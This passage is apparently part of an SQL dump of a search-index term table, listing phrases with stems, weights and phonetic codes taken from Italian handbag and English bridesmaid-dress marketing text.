striscia',0,1,1.6667,'S431532362',1,'en'),(35857,'tantissimo','tantissimo',0,0,0.6667,'T5325',1,'en'),(35858,'tantissimo the','tantissimo the',0,1,1.4667,'T53253',1,'en'),(35859,'tantissimo the borse','tantissimo the borse',0,1,1.6667,'T53253162',1,'en'),(35860,'tasca','tasca',0,0,0.3333,'T200',1,'en'),(35861,'tasca applicata','tasca applicata',0,1,1.5,'T21423',1,'en'),(35862,'tasca applicata scomparto','tasca applicata scomparto',0,1,1.8333,'T2142325163',1,'en'),(35863,'tasca concerning','tasca concerning',0,1,1.5333,'T252652',1,'en'),(35864,'tasca concerning cellulare','tasca concerning cellulare',0,1,1.8667,'T25265246',1,'en'),(35865,'tasche','tasch',0,0,0.4,'T200',1,'en'),(35866,'tasche interne','tasch interne',0,1,1.4667,'T25365',1,'en'),(35867,'tasche interne utilissime','tasch interne utilissime',0,1,1.8333,'T253653425',1,'en'),(35868,'tela','tela',0,0,0.2667,'T400',1,'en'),(35869,'tela di','tela di',0,1,1.2333,'T430',1,'en'),(35870,'tela di cotone','tela di cotone',0,1,1.4667,'T43235',1,'en'),(35871,'tela plissettate','tela plissettate',0,1,1.5333,'T41423',1,'en'),(35872,'tela plissettate di','tela plissettate di',0,1,1.6333,'T41423',1,'en'),(35873,'tendenza','tendenza',0,0,0.5333,'T5352',1,'en'),(35874,'tendenza cercando','tendenza cercando',0,1,1.5667,'T53526253',1,'en'),(35875,'tendenza cercando ralphlauren','tendenza cercando ralphlauren',0,1,1.9667,'T53526253641465',1,'en'),(35876,'the borse','the borse',0,1,1.3,'T162',1,'en'),(35877,'the borse oversize','the borse oversize',0,1,1.6,'T162162',1,'en'),(35878,'the creme','the creme',0,1,1.3,'T265',1,'en'),(35879,'the creme solari','the creme solari',0,1,1.5333,'T265246',1,'en'),(35880,'the donne','the donne',0,1,1.3,'T500',1,'en'),(35881,'the donne ioamo','the donne ioamo',0,1,1.5,'T500',1,'en'),(35882,'tre giocatori','tre giocatori',0,1,1.4333,'T6236',1,'en'),(35883,'tre giocatori sovradimensionato','tre giocatori sovradimensionato',0,1,2,'T623621635253',1,'en'),(35884,'troviamo','troviamo',0,0,0.5333,'T615',1,'en'),(35885,'troviamo borse','troviamo borse',0,1,1.4667,'T615162',1,'en'),(35886,'troviamo borse per','troviamo borse per',0,1,1.6,'T61516216',1,'en'),(35887,'trovo','trovo',0,0,0.3333,'T610',1,'en'),(35888,'trovo gna','trovo gna',0,1,1.3,'T6125',1,'en'),(35889,'trovo gna il','trovo gna il',0,1,1.4,'T61254',1,'en'),(35890,'turchese','turches',0,0,0.5333,'T620',1,'en'),(35891,'turchese n\'t','turches n',0,1,1.4,'T6253',1,'en'),(35892,'turchese n\'t bellissimo','turches n bellissimo',0,1,1.7667,'T62531425',1,'en'),(35893,'tutte the','tutt the',0,1,1.3,'T000',2,'en'),(35894,'tutte the donne','tutt the donne',0,1,1.5,'T500',1,'en'),(35895,'tutti gli stilisti','tutti gli stilisti',0,1,1.6,'T2423423',1,'en'),(35896,'tutti i','tutti i',0,1,1.2333,'T000',1,'en'),(35897,'tutti i gusti','tutti i gusti',0,1,1.4333,'T230',1,'en'),(35898,'tutto ciò','tutto ciò',0,1,1.3,'T200',1,'en'),(35899,'tutto ciò di','tutto ciò di',0,1,1.4,'T230',1,'en'),(35900,'tutto in','tutto in',0,1,1.2667,'T500',1,'en'),(35901,'tutto in onefetto','tutto in onefetto',0,1,1.5667,'T513',1,'en'),(35902,'un colore','un colore',0,1,1.3,'U5246',1,'en'),(35903,'un colore contrastante','un colore contrastante',0,1,1.7333,'U524625362353',1,'en'),(35904,'un lato','un lato',0,1,1.2333,'U543',1,'en'),(35905,'un lato nella','un lato nella',0,1,1.4333,'U54354',1,'en'),(35906,'una borsa','una borsa',0,1,1.3,'U5162',1,'en'),(35907,'una borsa polo','una borsa polo',0,1,1.4667,'U516214',1,'en'),(35908,'una borsa pratica','una borsa pratica',0,1,1.5667,'U51621632',1,'en'),(35909,'una fodera','una fodera',0,1,1.3333,'U5136',1,'en'),(35910,'una fodera a','una fodera a',0,1,1.4,'U5136',1,'en'),(35911,'una perfetta','una perfetta',0,1,1.4,'U51613',1,'en'),(35912,'una perfetta alleata','una perfetta alleata',0,1,1.6667,'U5161343',1,'en'),(35913,'uomo','uomo',0,0,0.2667,'U500',1,'en'),(35914,'uomo in','uomo in',0,1,1.2333,'U500',1,'en'),(35915,'uomo in croquet','uomo in croquet',0,1,1.5,'U52623',1,'en'),(35916,'utilissime','utilissim',0,0,0.6667,'U3425',1,'en'),(35917,'utilissime for','utilissim for',0,1,1.4667,'U342516',1,'en'),(35918,'utilissime for every','utilissim for every',0,1,1.6667,'U34251616',1,'en'),(35919,'vachetta','vachetta',0,0,0.5333,'V230',1,'en'),(35920,'vachetta ralph','vachetta ralph',0,1,1.4667,'V23641',1,'en'),(35921,'vachetta ralph lauren','vachetta ralph lauren',0,1,1.7,'V23641465',1,'en'),(35922,'varie','vari',0,0,0.3333,'V600',2,'en'),(35923,'varie specialist','vari specialist',0,1,1.5333,'V6212423',1,'en'),(35924,'varie specialist troviamo','vari specialist troviamo',0,1,1.8333,'V6212423615',1,'en'),(35925,'vastissima','vastissima',0,0,0.6667,'V2325',1,'en'),(35926,'vastissima la','vastissima la',0,1,1.4333,'V23254',1,'en'),(35927,'vastissima la borsa','vastissima la borsa',0,1,1.6333,'V23254162',1,'en'),(35928,'vibrante','vibrant',0,0,0.5333,'V653',1,'en'),(35929,'vibrante filo','vibrant filo',0,1,1.4333,'V65314',1,'en'),(35930,'vibrante filo multicolore','vibrant filo multicolore',0,1,1.8333,'V65314543246',1,'en'),(35931,'voi','voi',0,0,0.2,'V000',1,'en'),(35932,'voi la','voi la',0,1,1.2,'V400',1,'en'),(35933,'voi la beachfront','voi la beachfront',0,1,1.5667,'V4121653',1,'en'),(35934,'y l','y l',0,1,1.1,'Y400',1,'en'),(35935,'y l a.scelta','y l a.scelta',0,1,1.4,'Y4243',1,'en'),(35936,'yourself il','yourself il',0,1,1.3667,'Y62414',1,'en'),(35937,'yourself il necessario','yourself il necessario',0,1,1.7333,'Y62414526',1,'en'),(35946,'a chance','a chance',0,1,1.2667,'A252',1,'en'),(35947,'a chance to','a chance to',0,1,1.3667,'A2523',1,'en'),(35957,'a person','a person',0,1,1.2667,'A1625',1,'en'),(35965,'a united','a united',0,1,1.2667,'A530',1,'en'),(35966,'a united states','a united states',0,1,1.5,'A53232',1,'en'),(36005,'and they','and they',0,1,1.2667,'A530',1,'en'),(36024,'at a','at a',0,1,1.1333,'A300',1,'en'),(36040,'away','awai',0,0,0.2667,'A000',4,'en'),(36041,'away from','awai from',0,1,1.3,'A165',2,'en'),(36042,'away from the','awai from the',0,1,1.4333,'A1653',1,'en'),(36067,'but i','but i',0,1,1.1667,'B300',1,'en'),(36068,'but i was','but i was',0,1,1.3,'B320',1,'en'),(36076,'buy ralph','bui ralph',0,1,1.3,'B641',1,'en'),(36077,'buy ralph lauren','bui ralph lauren',0,1,1.5333,'B641465',1,'en'),(36085,'calls','call',0,0,0.3333,'C420',1,'en'),(36102,'chance','chanc',0,0,0.4,'C520',1,'en'),(36103,'chance to','chanc to',0,1,1.3,'C523',1,'en'),(36144,'consider','consid',0,0,0.5333,'C5236',1,'en'),(36178,'discount','discount',0,0,0.5333,'D253',1,'en'),(36187,'do it','do it',0,1,1.1667,'D000',1,'en'),(36189,'dollar','dollar',0,0,0.4,'D460',2,'en'),(36240,'far','far',0,0,0.2,'F600',1,'en'),(36350,'i found','i found',0,1,1.2333,'I153',1,'en'),(36367,'ideal','ideal',0,0,0.3333,'I340',1,'en'),(36389,'is where','is where',0,1,1.2667,'I260',1,'en'),(36403,'jeans','jean',0,0,0.3333,'J520',1,'en'),(36424,'less','less',0,0,0.2667,'L200',2,'en'),(36427,'let me','let me',0,1,1.2,'L350',1,'en'),(36434,'little of','littl of',0,1,1.3,'L341',1,'en'),(36453,'mall','mall',0,0,0.2667,'M400',1,'en'),(36463,'money','monei',0,0,0.3333,'M000',2,'en'),(36468,'money on','monei on',0,1,1.2667,'M000',1,'en'),(36472,'more of','more of',0,1,1.2333,'M610',1,'en'),(36521,'one of these','on of these',0,1,1.4,'O5132',1,'en'),(36534,'opportunity','opportun',0,0,0.7333,'O16353',1,'en'),(36565,'over to','over to',0,1,1.2333,'O163',1,'en'),(36574,'place on','place on',0,1,1.2667,'P425',1,'en'),(36594,'price','price',0,0,0.3333,'P620',1,'en'),(36692,'skip','skip',0,0,0.2667,'S100',1,'en'),(36702,'soccer','soccer',0,0,0.4,'S600',1,'en'),(36751,'tend','tend',0,0,0.2667,'T530',1,'en'),(36752,'tend to','tend to',0,1,1.2333,'T530',1,'en'),(36762,'that will show','that will show',0,1,1.4667,'T420',1,'en'),(36782,'the ideal','the ideal',0,1,1.3,'T400',1,'en'),(36788,'the only','the only',0,1,1.2667,'T540',2,'en'),(36792,'the polo','the polo',0,1,1.2667,'T140',1,'en'),(36814,'there are','there are',0,1,1.3,'T600',2,'en'),(36822,'they have','thei have',0,1,1.3,'T100',1,'en'),(36828,'they\'re','thei',0,0,0.4667,'T600',2,'en'),(36869,'to put','to put',0,1,1.2,'T130',1,'en'),(36920,'waste','wast',0,0,0.3333,'W230',1,'en'),(36941,'web site','web site',0,1,1.2667,'W123',1,'en'),(36970,'will show','will show',0,1,1.3,'W420',1,'en'),(36982,'would you','would you',0,1,1.3,'W430',1,'en'),(36984,'wrong','wrong',0,0,0.3333,'W652',1,'en'),(37013,'100 beautifully','100 beautifully',0,1,1.5,'B314',1,'en'),(37014,'100 beautifully beadwork','100 beautifully beadwork',0,1,1.8,'B3141362',1,'en'),(37015,'125','125',0,0,0.3,'',1,'en'),(37016,'2013 bridesmaid','2013 bridesmaid',0,1,1.5,'B63253',1,'en'),(37017,'2013 bridesmaid robes','2013 bridesmaid robes',0,1,1.7,'B63253612',1,'en'),(37018,'2013 promotion','2013 promotion',0,1,1.4667,'P6535',1,'en'),(37019,'2013 promotion flower','2013 promotion flower',0,1,1.7,'P6535146',1,'en'),(37020,'2013 so','2013 so',0,1,1.2333,'S000',1,'en'),(37021,'2013 so making','2013 so making',0,1,1.4667,'S5252',1,'en'),(37022,'2013 supply','2013 supply',0,1,1.3667,'S140',1,'en'),(37023,'2013 supply top','2013 supply top',0,1,1.5,'S1431',1,'en'),(37024,'a dress','a dress',0,1,1.2333,'A362',2,'en'),(37025,'a dress in','a dress in',0,1,1.3333,'A3625',1,'en'),(37026,'a great way','a great way',0,1,1.3667,'A263',1,'en'),(37027,'a way of','a way of',0,1,1.2667,'A100',1,'en'),(37028,'a wedding','a wedding',0,1,1.3,'A352',1,'en'),(37029,'a wedding or','a wedding or',0,1,1.4,'A3526',1,'en'),(37030,'able to our','abl to our',0,1,1.3667,'A1436',1,'en'),(37031,'add beautiful','add beautiful',0,1,1.4333,'A31314',1,'en'),(37032,'add beautiful detailing','add beautiful detailing',0,1,1.7667,'A313143452',1,'en'),(37033,'add something','add something',0,1,1.4333,'A325352',1,'en'),(37034,'add something unexpected','add something unexpected',0,1,1.8,'A32535252123',1,'en'),(37035,'adding today\'s','ad today',0,1,1.4667,'A35232',1,'en'),(37036,'adding today\'s truck','ad today truck',0,1,1.6667,'A35232362',1,'en'),(37037,'adornments','adorn',0,0,0.6667,'A36532',1,'en'),(37038,'adornments to','adorn to',0,1,1.4333,'A365323',1,'en'),(37039,'adornments to be','adorn to be',0,1,1.5333,'A3653231',1,'en'),(37040,'all women','all women',0,1,1.3,'A450',1,'en'),(37041,'all women on','all women on',0,1,1.4,'A450',1,'en'),(37042,'all your','all your',0,1,1.2667,'A460',1,'en'),(37043,'all your options','all your options',0,1,1.5333,'A461352',1,'en'),(37044,'an asymmetrical','an asymmetrical',0,1,1.5,'A5253624',1,'en'),(37045,'an asymmetrical dress','an asymmetrical dress',0,1,1.7,'A5253624362',1,'en'),(37046,'and appearance','and appearance',0,1,1.4667,'A531652',1,'en'),(37047,'and appearance of','and appearance of',0,1,1.5667,'A5316521',1,'en'),(37048,'and class','and class',0,1,1.3,'A53242',1,'en'),(37049,'and class you','and class you',0,1,1.4333,'A53242',1,'en'),(37050,'and feel','and feel',0,1,1.2667,'A5314',1,'en'),(37051,'and feel your','and feel your',0,1,1.4333,'A53146',1,'en'),(37052,'and luxe','and luxe',0,1,1.2667,'A5342',1,'en'),(37053,'and luxe textiles','and luxe textiles',0,1,1.5667,'A534232342',1,'en'),(37054,'and new','and new',0,1,1.2333,'A535',1,'en'),(37055,'and new this','and new this',0,1,1.4,'A53532',1,'en'),(37056,'and pick','and pick',0,1,1.2667,'A5312',1,'en'),(37057,'and pick the','and pick the',0,1,1.4,'A53123',1,'en'),(37058,'and robust','and robust',0,1,1.3333,'A536123',1,'en'),(37059,'and robust can','and robust can',0,1,1.4667,'A53612325',1,'en'),(37060,'and significantly','and significantly',0,1,1.5667,'A532512534',1,'en'),(37061,'and significantly we','and significantly we',0,1,1.6667,'A532512534',1,'en'),(37062,'and specially','and specially',0,1,1.4333,'A532124',1,'en'),(37063,'and specially when','and specially when',0,1,1.6,'A5321245',1,'en'),(37064,'and styles','and styles',0,1,1.3333,'A532342',1,'en'),(37065,'and styles for','and styles for',0,1,1.4667,'A53234216',1,'en'),(37066,'and wedding','and wedding',0,1,1.3667,'A5352',1,'en'),(37067,'and wedding participants','and wedding participants',0,1,1.8,'A535216321532',1,'en'),(37068,'appearance of your','appear of your',0,1,1.6,'A165216',1,'en'),(37069,'appreciated','appreci',0,0,0.7333,'A1623',1,'en'),(37070,'appreciated by','appreci by',0,1,1.4667,'A16231',1,'en'),(37071,'appreciated by younger','appreci by younger',0,1,1.7333,'A16231526',1,'en'),(37072,'are just','ar just',0,1,1.2667,'A623',1,'en'),(37073,'are just some','ar just some',0,1,1.4333,'A62325',1,'en'),(37074,'are thousands','ar thousands',0,1,1.4333,'A632532',1,'en'),(37075,'are thousands of','ar thousands of',0,1,1.5333,'A6325321',1,'en'),(37076,'around the','around the',0,1,1.3333,'A653',1,'en'),(37077,'around the today','around the today',0,1,1.5333,'A653',1,'en'),(37078,'as lace','as lace',0,1,1.2333,'A242',1,'en'),(37079,'as lace or','as lace or',0,1,1.3333,'A2426',1,'en'),(37080,'asymmetrical','asymmetr',0,0,0.8,'A253624',1,'en'),(37081,'asymmetrical dress','asymmetr dress',0,1,1.6,'A253624362',1,'en'),(37082,'asymmetrical dress can','asymmetr dress can',0,1,1.7333,'A2536243625',1,'en'),(37083,'at noondress','at noondress',0,1,1.4,'A35362',1,'en'),(37084,'at noondress can','at noondress can',0,1,1.5333,'A353625',1,'en'),(37085,'australia','australia',0,0,0.6,'A2364',2,'en'),(37086,'australia wedding','australia wedding',0,1,1.5667,'A2364352',1,'en'),(37087,'australia wedding prom','australia wedding prom',0,1,1.7333,'A2364352165',1,'en'),(37088,'available','avail',0,0,0.6,'A1414',2,'en'),(37089,'available overall','avail overall',0,1,1.5667,'A1414164',1,'en'),(37090,'available overall there','avail overall there',0,1,1.7667,'A141416436',1,'en'),(37091,'balfleet com prom','balfleet com prom',0,1,1.5667,'B414325165',1,'en'),(37092,'band','band',0,0,0.2667,'B530',1,'en'),(37093,'band the','band the',0,1,1.2667,'B530',1,'en'),(37094,'band the dresses','band the dresses',0,1,1.5333,'B5362',1,'en'),(37095,'be a great','be a great',0,1,1.3333,'B263',1,'en'),(37096,'be appreciated','be appreciated',0,1,1.4667,'B623',1,'en'),(37097,'be appreciated by','be appreciated by',0,1,1.5667,'B6231',1,'en'),(37098,'be sure','be sure',0,1,1.2333,'B260',1,'en'),(37099,'be sure of','be sure of',0,1,1.3333,'B261',1,'en'),(37100,'be sure to','be sure to',0,1,1.3333,'B263',1,'en'),(37101,'beadwork','beadwork',0,0,0.5333,'B362',1,'en'),(37102,'beadwork and','beadwork and',0,1,1.4,'B36253',1,'en'),(37103,'beadwork and luxe','beadwork and luxe',0,1,1.5667,'B3625342',1,'en'),(37104,'beautiful detailing','beauti detailing',0,1,1.6333,'B3143452',1,'en'),(37105,'beautiful detailing to','beauti detailing to',0,1,1.7333,'B31434523',1,'en'),(37106,'beautifully','beautifulli',0,0,0.7333,'B314',1,'en'),(37107,'beautifully beadwork','beautifulli beadwork',0,1,1.6667,'B3141362',1,'en'),(37108,'beautifully beadwork and','beautifulli beadwork and',0,1,1.8,'B314136253',1,'en'),(37109,'being delighted','be delighted',0,1,1.5,'B523423',1,'en'),(37110,'being delighted by','be delighted by',0,1,1.6,'B5234231',1,'en'),(37111,'best on','best on',0,1,1.2333,'B235',1,'en'),(37112,'best on crucial','best on crucial',0,1,1.5,'B2352624',1,'en'),(37113,'best the','best the',0,1,1.2667,'B230',1,'en'),(37114,'best the irregular','best the irregular',0,1,1.6,'B236246',1,'en'),(37115,'blossom','blossom',0,0,0.4667,'B425',1,'en'),(37116,'blossom girl','blossom girl',0,1,1.4,'B425264',1,'en'),(37117,'blossom girl dresses','blossom girl dresses',0,1,1.6667,'B425264362',1,'en'),(37118,'both the price','both the price',0,1,1.4667,'B3162',1,'en'),(37119,'bridal dresses','bridal dresses',0,1,1.4667,'B634362',1,'en'),(37120,'bridal dresses generate','bridal dresses generate',0,1,1.7667,'B634362563',1,'en'),(37121,'bridal dresses wedding','bridal dresses wedding',0,1,1.7333,'B634362352',1,'en'),(37122,'bridal gowns','bridal gowns',0,1,1.4,'B634252',1,'en'),(37123,'bridal gowns truly','bridal gowns truly',0,1,1.6,'B634252364',1,'en'),(37124,'brides','bride',0,0,0.4,'B632',1,'en'),(37125,'brides and','bride and',0,1,1.3333,'B63253',1,'en'),(37126,'brides and wedding','bride and wedding',0,1,1.6,'B6325352',1,'en'),(37127,'bridesmaid','bridesmaid',0,0,0.6667,'B63253',1,'en'),(37128,'bridesmaid dresses','bridesmaid dresses',0,1,1.6,'B6325362',1,'en'),(37129,'bridesmaid dresses 2013','bridesmaid dresses 2013',0,1,1.7667,'B6325362',1,'en'),(37130,'bridesmaid robes','bridesmaid robes',0,1,1.5333,'B63253612',1,'en'),(37131,'bridesmaid robes blossom','bridesmaid robes blossom',0,1,1.8,'B632536121425',1,'en'),(37132,'bridesmiad','bridesmiad',0,0,0.6667,'B63253',1,'en'),(37133,'bridesmiad gowns','bridesmiad gowns',0,1,1.5333,'B63253252',1,'en'),(37134,'bridesmiad gowns 2013','bridesmiad gowns 2013',0,1,1.7,'B63253252',1,'en'),(37135,'by both','by both',0,1,1.2333,'B300',1,'en'),(37136,'by both the','by both the',0,1,1.3667,'B300',1,'en'),(37137,'by younger','by younger',0,1,1.3333,'B526',1,'en'),(37138,'by younger brides','by younger brides',0,1,1.5667,'B5261632',1,'en'),(37139,'can add','can add',0,1,1.2333,'C530',1,'en'),(37140,'can add something','can add something',0,1,1.5667,'C5325352',1,'en'),(37141,'can be a','can be a',0,1,1.2667,'C510',1,'en'),(37142,'can be appreciated','can be appreciated',0,1,1.6,'C51623',1,'en'),(37143,'can seem','can seem',0,1,1.2667,'C525',1,'en'),(37144,'can seem impossible','can seem impossible',0,1,1.6333,'C5251214',1,'en'),(37145,'choices','choic',0,0,0.4667,'C000',1,'en'),(37146,'choices and','choic and',0,1,1.3667,'C530',1,'en'),(37147,'choices and styles','choic and styles',0,1,1.6,'C532342',1,'en'),(37148,'class','class',0,0,0.3333,'C420',2,'en'),(37149,'class you','class you',0,1,1.3,'C420',1,'en'),(37150,'class you will','class you will',0,1,1.4667,'C424',1,'en'),(37151,'coatings','coat',0,0,0.5333,'C352',1,'en'),(37152,'coatings of','coat of',0,1,1.3667,'C3521',1,'en'),(37153,'coatings of ruffles','coat of ruffles',0,1,1.6333,'C35216142',1,'en'),(37154,'collection of','collect of',0,1,1.4333,'C42351',1,'en'),(37155,'collection of bridal','collect of bridal',0,1,1.6667,'C42351634',1,'en'),(37156,'collection we\'ve','collect we',0,1,1.5333,'C42351',1,'en'),(37157,'collection we\'ve put','collect we put',0,1,1.6667,'C423513',1,'en'),(37158,'collections at','collect at',0,1,1.4667,'C423523',1,'en'),(37159,'collections at noondress','collect at noondress',0,1,1.8,'C4235235362',1,'en'),(37160,'colors','color',0,0,0.4,'C462',1,'en'),(37161,'colors use','color use',0,1,1.3333,'C462',1,'en'),(37162,'colors use the','color use the',0,1,1.4667,'C4623',1,'en'),(37163,'com prom','com prom',0,1,1.2667,'C5165',1,'en'),(37164,'com prom bridesmiad','com prom bridesmiad',0,1,1.6333,'C5165163253',1,'en'),(37165,'comes to','come to',0,1,1.2667,'C523',1,'en'),(37166,'comes to holding','come to holding',0,1,1.5333,'C5234352',1,'en'),(37167,'consider all','consid all',0,1,1.4,'C52364',1,'en'),(37168,'consider all your','consid all your',0,1,1.5667,'C523646',1,'en'),(37169,'couture','coutur',0,0,0.4667,'C360',1,'en'),(37170,'couture dresses','coutur dresses',0,1,1.5,'C36362',1,'en'),(37171,'couture dresses prom','coutur dresses prom',0,1,1.6667,'C36362165',1,'en'),(37172,'criteria for','criteria for',0,1,1.4,'C63616',1,'en'),(37173,'criteria for many','criteria for many',0,1,1.5667,'C636165',1,'en'),(37174,'crucial','crucial',0,0,0.4667,'C624',1,'en'),(37175,'crucial day','crucial day',0,1,1.3667,'C6243',1,'en'),(37176,'crucial day of','crucial day of',0,1,1.4667,'C62431',1,'en'),(37177,'day of','dai of',0,1,1.2,'D100',1,'en'),(37178,'day of your','dai of your',0,1,1.3667,'D160',1,'en'),(37179,'delighted','delight',0,0,0.6,'D423',1,'en'),(37180,'delighted by','delight by',0,1,1.4,'D4231',1,'en'),(37181,'delighted by both','delight by both',0,1,1.5667,'D42313',1,'en'),(37182,'design many','design many',0,1,1.3667,'D250',1,'en'),(37183,'design many more','design many more',0,1,1.5333,'D256',1,'en'),(37184,'designer couture','design couture',0,1,1.5333,'D256236',1,'en'),(37185,'designer couture dresses','design couture dresses',0,1,1.8,'D256236362',1,'en'),(37186,'designs in','design in',0,1,1.3333,'D2525',1,'en'),(37187,'designs in overall','design in overall',0,1,1.6,'D2525164',1,'en'),(37188,'designs such','design such',0,1,1.4,'D252',1,'en'),(37189,'designs such as','design such as',0,1,1.5,'D252',1,'en'),(37190,'detail','detail',0,0,0.4,'D400',2,'en'),(37191,'detail in','detail in',0,1,1.3,'D450',1,'en'),(37192,'detail in our','detail in our',0,1,1.4333,'D456',1,'en'),(37193,'detailing','detail',0,0,0.6,'D452',1,'en'),(37194,'detailing to','detail to',0,1,1.4,'D4523',1,'en'),(37195,'discount wedding','discount wedding',0,1,1.5333,'D25352',1,'en'),(37196,'discount wedding www','discount wedding www',0,1,1.6667,'D25352',1,'en'),(37197,'dress can','dress can',0,1,1.3,'D625',1,'en'),(37198,'dress can add','dress can add',0,1,1.4333,'D6253',1,'en'),(37199,'dress in one','dress in one',0,1,1.4,'D625',1,'en'),(37200,'dresses 2013','dress 2013',0,1,1.4,'D620',1,'en'),(37201,'dresses 2013 bridesmaid','dress 2013 bridesmaid',0,1,1.7667,'D62163253',1,'en'),(37202,'dresses 2013 so','dress 2013 so',0,1,1.5,'D620',1,'en'),(37203,'dresses 2013 supply','dress 2013 supply',0,1,1.6333,'D6214',1,'en'),(37204,'dresses australia','dress australia',0,1,1.5667,'D62364',1,'en'),(37205,'dresses australia wedding','dress australia wedding',0,1,1.8333,'D62364352',1,'en'),(37206,'dresses generate','dress generate',0,1,1.5333,'D62563',1,'en'),(37207,'dresses generate designer','dress generate designer',0,1,1.8333,'D62563256',1,'en'),(37208,'dresses is','dress is',0,1,1.3333,'D620',1,'en'),(37209,'dresses is in','dress is in',0,1,1.4333,'D625',1,'en'),(37210,'dresses mother','dress mother',0,1,1.4667,'D62536',1,'en'),(37211,'dresses mother of','dress mother of',0,1,1.5667,'D625361',1,'en'),(37212,'dresses or','dress or',0,1,1.3333,'D626',1,'en'),(37213,'dresses or other','dress or other',0,1,1.5333,'D62636',1,'en'),(37214,'dresses order','dress order',0,1,1.4333,'D62636',1,'en'),(37215,'dresses order around','dress order around',0,1,1.6667,'D6263653',1,'en'),(37216,'dresses prom','dress prom',0,1,1.4,'D62165',1,'en'),(37217,'dresses prom dresses','dress prom dresses',0,1,1.6667,'D62165362',1,'en'),(37218,'dresses quinceanera','dress quinceanera',0,1,1.6333,'D625256',1,'en'),(37219,'dresses quinceanera dresses','dress quinceanera dresses',0,1,1.9,'D625256362',1,'en'),(37220,'dresses short','dress short',0,1,1.4333,'D6263',1,'en'),(37221,'dresses short party','dress short party',0,1,1.6333,'D6263163',1,'en'),(37222,'dresses tropical','dress tropical',0,1,1.5333,'D6236124',1,'en'),(37223,'dresses tropical drink','dress tropical drink',0,1,1.7333,'D62361243652',1,'en'),(37224,'dresses under','dress under',0,1,1.4333,'D62536',1,'en'),(37225,'dresses under 100','dress under 100',0,1,1.5667,'D62536',1,'en'),(37226,'dresses wedding','dress wedding',0,1,1.5,'D62352',1,'en'),(37227,'dresses wedding dresses','dress wedding dresses',0,1,1.7667,'D62352362',1,'en'),(37228,'drink','drink',0,0,0.3333,'D652',1,'en'),(37229,'drink dresses','drink dresses',0,1,1.4333,'D652362',1,'en'),(37230,'drink dresses order','drink dresses order',0,1,1.6333,'D652362636',1,'en'),(37231,'elegance and','eleg and',0,1,1.4,'E425253',1,'en'),(37232,'elegance and class','eleg and class',0,1,1.6,'E425253242',1,'en'),(37233,'eve','ev',0,0,0.2,'E100',1,'en'),(37234,'eve of','ev of',0,1,1.2,'E100',1,'en'),(37235,'eve of her','ev of her',0,1,1.3333,'E160',1,'en'),(37236,'fashion criteria','fashion criteria',0,1,1.5333,'F252636',1,'en'),(37237,'fashion criteria for','fashion criteria for',0,1,1.6667,'F25263616',1,'en'),(37238,'feel your','feel your',0,1,1.3,'F460',1,'en'),(37239,'feel your best','feel your best',0,1,1.4667,'F46123',1,'en'),(37240,'figure the','figur the',0,1,1.3333,'F263',1,'en'),(37241,'figure the best','figur the best',0,1,1.5,'F263123',1,'en'),(37242,'first place','first place',0,1,1.3667,'F623142',1,'en'),(37243,'first place on','first place on',0,1,1.4667,'F6231425',1,'en'),(37244,'flower girl','flower girl',0,1,1.3667,'F46264',1,'en'),(37245,'flower girl dresses','flower girl dresses',0,1,1.6333,'F46264362',1,'en'),(37246,'for a dress','for a dress',0,1,1.3667,'F6362',1,'en'),(37247,'for all women','for all women',0,1,1.4333,'F645',1,'en'),(37248,'for many','for many',0,1,1.2667,'F650',1,'en'),(37249,'for many women','for many women',0,1,1.4667,'F650',1,'en'),(37250,'fund management solutions','fund management solutions',0,1,1.8333,'F53525324352',1,'en'),(37251,'funky','funki',0,0,0.3333,'F520',1,'en'),(37252,'funky and','funki and',0,1,1.3,'F5253',1,'en'),(37253,'funky and new','funki and new',0,1,1.4333,'F52535',1,'en'),(37254,'generate designer','gener designer',0,1,1.5667,'G563256',1,'en'),(37255,'generate designer couture','gener designer couture',0,1,1.8333,'G563256236',1,'en'),(37256,'girl','girl',0,0,0.2667,'G640',1,'en'),(37257,'girl dresses','girl dresses',0,1,1.4,'G64362',1,'en'),(37258,'girl dresses australia','girl dresses australia',0,1,1.7333,'G64362364',1,'en'),(37259,'girl dresses mother','girl dresses mother',0,1,1.6333,'G64362536',1,'en'),(37260,'gown','gown',0,0,0.2667,'G500',1,'en'),(37261,'gown then','gown then',0,1,1.3,'G535',1,'en'),(37262,'gown then looking','gown then looking',0,1,1.5667,'G5354252',1,'en'),(37263,'gowns','gown',0,0,0.3333,'G520',2,'en'),(37264,'gowns 2013','gown 2013',0,1,1.3333,'G520',1,'en'),(37265,'gowns 2013 promotion','gown 2013 promotion',0,1,1.6667,'G5216535',1,'en'),(37266,'gowns truly','gown truly',0,1,1.3667,'G52364',1,'en'),(37267,'gowns truly standout','gown truly standout',0,1,1.6667,'G523642353',1,'en'),(37268,'great way','great way',0,1,1.3,'G630',1,'en'),(37269,'great way to','great way to',0,1,1.4,'G630',1,'en'),(37270,'have list','have list',0,1,1.3,'H1423',1,'en'),(37271,'have list of','have list of',0,1,1.4,'H14231',1,'en'),(37272,'her marriage','her marriage',0,1,1.4,'H6562',1,'en'),(37273,'her marriage prom','her marriage prom',0,1,1.5667,'H6562165',1,'en'),(37274,'holding weddings','hold weddings',0,1,1.5333,'H4352352',1,'en'),(37275,'holding weddings in','hold weddings in',0,1,1.6333,'H43523525',1,'en'),(37276,'iconic colors','icon colors',0,1,1.4333,'I252462',1,'en'),(37277,'iconic colors use','icon colors use',0,1,1.5667,'I252462',1,'en'),(37278,'if you want','if you want',0,1,1.3667,'I153',1,'en'),(37279,'impossible','imposs',0,0,0.6667,'I51214',1,'en'),(37280,'impossible if','imposs if',0,1,1.4333,'I512141',1,'en'),(37281,'impossible if you','imposs if you',0,1,1.5667,'I512141',1,'en'),(37282,'impression','impress',0,0,0.6667,'I51625',1,'en'),(37283,'impression is','impress is',0,1,1.4333,'I516252',1,'en'),(37284,'impression is one','impress is one',0,1,1.5667,'I5162525',1,'en'),(37285,'in first','in first',0,1,1.2667,'I51623',1,'en'),(37286,'in first place','in first place',0,1,1.4667,'I51623142',1,'en'),(37287,'in one','in one',0,1,1.2,'I500',1,'en'),(37288,'in one of','in one of',0,1,1.3,'I510',1,'en'),(37289,'in our','in our',0,1,1.2,'I560',1,'en'),(37290,'in our dresses','in our dresses',0,1,1.4667,'I56362',1,'en'),(37291,'in overall','in overall',0,1,1.3333,'I5164',1,'en'),(37292,'in overall impression','in overall impression',0,1,1.7,'I516451625',1,'en'),(37293,'in shape','in shape',0,1,1.2667,'I521',1,'en'),(37294,'in shape look','in shape look',0,1,1.4333,'I52142',1,'en'),(37295,'in the band','in the band',0,1,1.3667,'I53153',1,'en'),(37296,'in traditional','in traditional',0,1,1.4667,'I536354',1,'en'),(37297,'in traditional settings','in traditional 